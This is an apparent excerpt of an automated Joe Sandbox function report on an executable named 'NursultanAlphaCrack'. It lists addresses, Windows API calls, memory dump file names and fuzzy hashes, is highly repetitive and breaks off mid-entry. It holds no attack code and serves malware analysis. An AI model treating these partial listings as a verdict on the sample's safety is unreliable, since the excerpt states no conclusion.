Opcode Fuzzy Hash: 7bcf6e26fbb85f9635a40540957c2f50dbca092fea924ee0a479138a3b17f770
Instruction Fuzzy Hash: B3316B71C04249EECF15DFA5D991AEEBBB4AF29304F10449FE40AB7242D775AE04CB61

Function 001EAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,001F3A34), ref: 001EACF8

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 84c93131b9221e2bd87fd955947e34aecd8bda26d7aa00a26ffbb4125c6a0f8f
Instruction ID: a4b327f59c1ac5b7cc34347cf69e4b186863c3b01c01de4e09c1922980c52ab7
Opcode Fuzzy Hash: 84c93131b9221e2bd87fd955947e34aecd8bda26d7aa00a26ffbb4125c6a0f8f
Instruction Fuzzy Hash: A7113A33600A656F9B269E5AEC4096E73D5AF807207664220FC15AB664D730FC41C7D2

Function 001C9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C921A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e4e49659e97e92dccb48fce0bb8f62411d0c48ded9edb0dafa531fedd0359879
Instruction ID: f8b9cf2aad09e38ddd9623c7eb24611344b9465b0fbe2f0041a0a2ab76141aa7
Opcode Fuzzy Hash: e4e49659e97e92dccb48fce0bb8f62411d0c48ded9edb0dafa531fedd0359879
Instruction Fuzzy Hash: 02018233900568ABCF21ABA8CC85FDEB771BFB8750B05412DE812BB252DB34DD0086A0

Function 001EC479 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 001EB136: RtlAllocateHeap.NTDLL(00000008,001F3A34,00000000,?,001E989A,00000001,00000364,?,?,?,001CD984,?,?,?,00000004,001CD710), ref: 001EB177

_free.LIBCMT ref: 001EC4E5

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction ID: 8e084b16aa12c4a0c80f4c2c30c9fe17e3d39454b6783a444423bd65b98f71aa
Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
Instruction Fuzzy Hash: 0A0126722047856BE3318F6A9C8196EFBE8FB85370F25051DE584832C1EB30A806C764

Function 001EB136 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,001F3A34,00000000,?,001E989A,00000001,00000364,?,?,?,001CD984,?,?,?,00000004,001CD710), ref: 001EB177

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: eda94379e1d7cffbea5986b560b72e0c571fa62780e3c75898d950af2a4e2870
Instruction ID: afa516b8bc5f6cdc4573938ee9b71118a3d1c5243c19320e169098fbee38fde9
Opcode Fuzzy Hash: eda94379e1d7cffbea5986b560b72e0c571fa62780e3c75898d950af2a4e2870
Instruction Fuzzy Hash: 47F0E93250DDE5B7EB255B23BD69BAF7748AF51770B198121FC0897190CB20DD0182E0

Function 001E3C0D Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 001E3C3F

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 359e91ab955dcc26edcfc61effd2d001e2a754647ad46d1eab99907840f115f0
Instruction ID: 9b80f9850f5b9c1120fa96c3324e7be3dbcc2bf866e7bb0afdc73471d3b25fac
Opcode Fuzzy Hash: 359e91ab955dcc26edcfc61effd2d001e2a754647ad46d1eab99907840f115f0
Instruction Fuzzy Hash: 36F0EC32200656AFCF164EAAFC0899E7799EF05B217244126FA25E71D0DB31DB20C790

Function 001E8E06 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,001ECA2C,00000000,?,001E6CBE,?,00000008,?,001E91E0,?,?,?), ref: 001E8E38

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ae12613bf8cf0cbf887f55d57fed0adb09d089ae964ba4222684b4e3bbe6c9d
Instruction ID: f0b44f6575554796be6e47a5614c0f5d98653dd0b7123a4be4dd46efd8687b20
Opcode Fuzzy Hash: 1ae12613bf8cf0cbf887f55d57fed0adb09d089ae964ba4222684b4e3bbe6c9d
Instruction Fuzzy Hash: 07E0ED31202EE56AEB75276B9D08BAF36899B927B0F160120AC1C97081CF20CC0082E0

Function 001C5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001C5AC2

Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: fcda34a3bc641a7e3c64e89dbd758782d00969c6684ceacf7439b1011fcb96a3
Instruction ID: 0bcd80bafd19beddbae193bb9e94e985a2a5cf8a246cfa621d684504f991573b
Opcode Fuzzy Hash: fcda34a3bc641a7e3c64e89dbd758782d00969c6684ceacf7439b1011fcb96a3
Instruction Fuzzy Hash: 05018C30810794DAD726E7B8C0427EDFBE49F78304F58848EA45663382CBB46B08D7A2

Function 001CA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 001CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6C4
Part of subcall function 001CA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6F2
Part of subcall function 001CA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,001CA592,000000FF,?,?), ref: 001CA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: a331f24b382a548c1692d8de147c7cc3eb31e56c4643891b9811bde91c39bf71
Instruction ID: 2f41e4f50d014d1d75220ce4e3f7241b8617af601f3ef8076c23e1660403b43b
Opcode Fuzzy Hash: a331f24b382a548c1692d8de147c7cc3eb31e56c4643891b9811bde91c39bf71
Instruction Fuzzy Hash: 28F05E324087A4AACA2357B48905FDA7B906F3A329F44CA4DF1F952196C36590949B23

Function 001D0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 001D0E3D

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: d6a9d0e5451024c749cf85e5700d0b79ac2e3ecacc393c1120f2771ed68ea7e8
Instruction ID: a99861c1e538fb2e217b799b9bc8574838d78e7f6555f8c25befaef6015804a2
Opcode Fuzzy Hash: d6a9d0e5451024c749cf85e5700d0b79ac2e3ecacc393c1120f2771ed68ea7e8
Instruction Fuzzy Hash: DED012116111947AEB1233296859BFE26168FFA711F0D006BB585577C3CF544986A261

Function 001DA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 001DA62C

Part of subcall function 001DA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001DA3DA

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: d23a8cc11120d8f4ae0e55f21e13d6f8d14f3e7e3d713327176f5ab17daa31e5
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 6DD0C971214209BADF46AB61CC1296E7A9AEF11340F448127B842D9391EBF1E910A662

Function 001DDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,001D1B3E), ref: 001DDD92

Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 7da209e74292849d5ad01327562ceae9088e8102ed9ec2d632f1aba09446b5cc
Instruction ID: 4f12f6464871fb6d720d113cca65c54ab6607647a66cc702b0cabb1e282b9c55
Opcode Fuzzy Hash: 7da209e74292849d5ad01327562ceae9088e8102ed9ec2d632f1aba09446b5cc
Instruction Fuzzy Hash: 0DD09E31148300BAD6126B51ED0AF0B7AE2AB98B04F404555B285740B287729D31DF11

Function 001DE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 001DE5E3

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 526bf541e1c9201af3fab9c5a1d25a2b31c03e5b0eca57c8361d8a0ffb6f3c80
Instruction ID: 6b406d9b0340ac656012a9e8b72eb9289085c6db13495d56b0d9f9d2e9b01df3
Opcode Fuzzy Hash: 526bf541e1c9201af3fab9c5a1d25a2b31c03e5b0eca57c8361d8a0ffb6f3c80
Instruction Fuzzy Hash: E8D0A9B8080240AAC312FBE8B88AB1432D0B330B47F800153B204C96A0CB6480A1CA02

Function 001C98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,001C97BE), ref: 001C98C8

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 4dfaa793c5e8699ba6fcf2f975c0c7263573c55cdd5cca91aa6af90f895c06ba
Instruction ID: 6768075240f0334757e138a5f76d4a2bbae16e0db2643bf72cb90f667f9410df
Opcode Fuzzy Hash: 4dfaa793c5e8699ba6fcf2f975c0c7263573c55cdd5cca91aa6af90f895c06ba
Instruction Fuzzy Hash: 8DC0123440028A968E208A24984C9AA7722AB633A67B486D8D0288A0E1C322CC87EA01

Function 001DEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DEAF9

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7c956c68a1716a1e9bfc912e2a0c7b71badcfc658c59f925f02991f3558f54ad
Instruction ID: 2ad6c12305c42669df87385c691a226cf5f2da4ad00a51a934c5f7c76afe5de9
Opcode Fuzzy Hash: 7c956c68a1716a1e9bfc912e2a0c7b71badcfc658c59f925f02991f3558f54ad
Instruction Fuzzy Hash: BEB012D73AE4977C3108F2402E02C37015CC0D0BA3330802FF500CC2C1DE801D012471

Function 001DE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc32c9f66e43e9531cad712511caeb8050f8ff6e83300a7d9a9e359016416e1e
Instruction ID: ba9d242d6e518ee23e9eb4647eccd90d9d3e37b1f989665e53ba59617c0364d3
Opcode Fuzzy Hash: fc32c9f66e43e9531cad712511caeb8050f8ff6e83300a7d9a9e359016416e1e
Instruction Fuzzy Hash: 9BB012E33AC0547C3108B1442E02C37029CD4C0B22330C02FF608D9380DA401D092473

Function 001DE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb2e2249eaab6afded1b27e100af6eee9c4a6854a0a327316e2a5b8fcb56f56e
Instruction ID: 5e4814f7c2407bed36b73f598f8eb3860dcc26f49328fccff699bc4bb240903f
Opcode Fuzzy Hash: eb2e2249eaab6afded1b27e100af6eee9c4a6854a0a327316e2a5b8fcb56f56e
Instruction Fuzzy Hash: D6B012F22AC054BC3108F1442D02C37029CC5C0F32330802FF908C9380DA445F002473

Function 001DE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE3FC

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 79ffe904eb35cb7c71f78172d11e3c404543f974eba537326890c37977623c9f
Instruction ID: 601be51d8053df137409a29c5f6cb0c7d5553ab845569ad60ad2cffa70149f98
Opcode Fuzzy Hash: 79ffe904eb35cb7c71f78172d11e3c404543f974eba537326890c37977623c9f
Instruction Fuzzy Hash: AAB012E32AC054BC3108F1442D02C37029CD5C0B22330C02FF908C9380DA405D042473

Function 001DE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 001DE51F

Part of subcall function 001DE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 001DE8D0
Part of subcall function 001DE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 001DE8E1

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
